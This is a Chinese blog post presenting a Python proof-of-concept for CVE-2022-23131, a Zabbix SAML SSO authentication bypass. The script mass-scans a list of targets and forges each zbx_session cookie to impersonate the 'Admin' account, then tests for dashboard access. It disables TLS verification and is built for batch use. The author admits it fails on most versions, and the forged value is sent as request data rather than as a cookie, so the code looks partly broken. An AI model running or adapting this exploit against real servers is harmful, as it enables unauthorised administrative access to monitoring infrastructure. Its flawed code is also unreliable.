zabbix SSO漏洞CVE-2022-23131
NO.1 废话
前段时间看到的这个sso洞,就造个轮子练练手。本菜狗多年脚本小子,代码就凑活看了。
NO.2 POC
和gayhub其他poc一样,cookie获取没问题,sso认证有问题,多数环境测试sso不成功,太挑版本了。
import requests
import re
from bs4 import BeautifulSoup
import base64
import urllib.parse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
# Silence the urllib3 warning that would otherwise be printed for every
# verify=False request made below; certificate validation itself is still
# switched off per request, not here.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Request headers shared by every probe: a JSON Accept header and a desktop
# browser User-Agent (value kept verbatim from the original).
headers = dict(
    (
        ("Accept", "application/json"),
        (
            "User-agent",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55",
        ),
    )
)
# Account name that get_url writes into the rebuilt session's
# saml_data.username_attribute field.
name = "Admin"
def get_url(target_url: str) -> None:
    """Probe every Zabbix base URL listed in the file at *target_url*.

    For each line: fetch the base URL, read the ``zbx_session`` cookie the
    response sets, decode it (URL-decode, base64-decode, JSON), rebuild it
    with ``saml_data.username_attribute`` set to the module-level ``name``
    while keeping the original ``sessionid`` and ``sign`` untouched, then
    request ``/index_sso.php`` and report whether the response contains the
    dashboard marker. Results are only printed; nothing is returned, and any
    exception raised for one target is printed before the loop moves on.

    This is the proof-of-concept for CVE-2022-23131 named in the page title:
    it relies on the server accepting the original ``sign`` next to an
    altered ``saml_data`` block. From a defender's side the remedy is the
    vendor fix for that CVE; an attempt of this shape should be visible as
    an ``index_sso.php`` request whose ``zbx_session`` cookie carries a
    ``saml_data`` block the SSO flow never issued -- TODO confirm against
    the deployment's access logs.

    Args:
        target_url: path of a text file with one base URL per line. The
            same name is reused below as the per-line loop variable, so the
            file path is no longer available after the loop starts.
    """
    with open(target_url, 'r') as f:  # read the target list, one URL per line
        for target_url in f:
            # Drop the trailing newline. The original author notes that
            # str.replace("\n", "") would fit better here.
            url = target_url.strip('\n')
            try:  # keep scanning on any per-target error
                # verify=False: TLS certificate checks are skipped; the
                # matching warning is silenced at module level.
                reponse_get = requests.get(url=url,headers=headers,timeout=3,verify=False)
                if reponse_get.status_code == 200 :
                    # KeyError when no zbx_session cookie is set is caught below.
                    cookie = reponse_get.cookies["zbx_session"]
                    print("地址{}\n请求成功".format(url))
                    # Cookie value is URL-encoded base64 wrapping a JSON object.
                    decode_cookie=base64.b64decode(urllib.parse.unquote(cookie))
                    str_cookie = str(decode_cookie,encoding='utf-8')
                    json_cookie = json.loads(str_cookie)
                    # Rebuilt session: new saml_data, original sessionid and sign reused.
                    dic_data = dict(saml_data=dict(username_attribute=name),sessionid=json_cookie['sessionid'],sign=json_cookie['sign'])
                    json_data = json.dumps(dic_data)
                    # Re-encode in the same base64 + URL-quoted form.
                    encode_session = urllib.parse.quote(base64.b64encode(json_data.encode()))
                    zbx_session = "zbx_session:"+encode_session
                    print("\033[32mcookie:{}".format(zbx_session))
                    # Second request against the SSO endpoint; the response text
                    # is searched for the dashboard marker to decide success.
                    cookie_get = requests.get(url=url+"/index_sso.php",headers=headers,data=zbx_session,timeout=3,verify=False)
                    if "action=dashboard.view" in cookie_get.text:
                        print("\033[32m[❤️]请求成功,cookie可用:{}".format(zbx_session))
                    else:
                        print("\033[31m[☠️] sso认证失败,请自行测试。 \033[0m")
                else:
                    print("请求失败")
                    #sys.exit(0)
            except Exception as e:
                # Broad catch is deliberate: one bad target must not stop the scan.
                print("\033[31m[☠️] 程序异常:{} \033[0m".format(e))
                continue
if __name__ == '__main__':
    # Entry point: ask for the path of the target list (the prompt expects the
    # file to be dragged into the terminal) and hand it to get_url.
    list_path = input('请拖入检测列表:')
    get_url(str(list_path))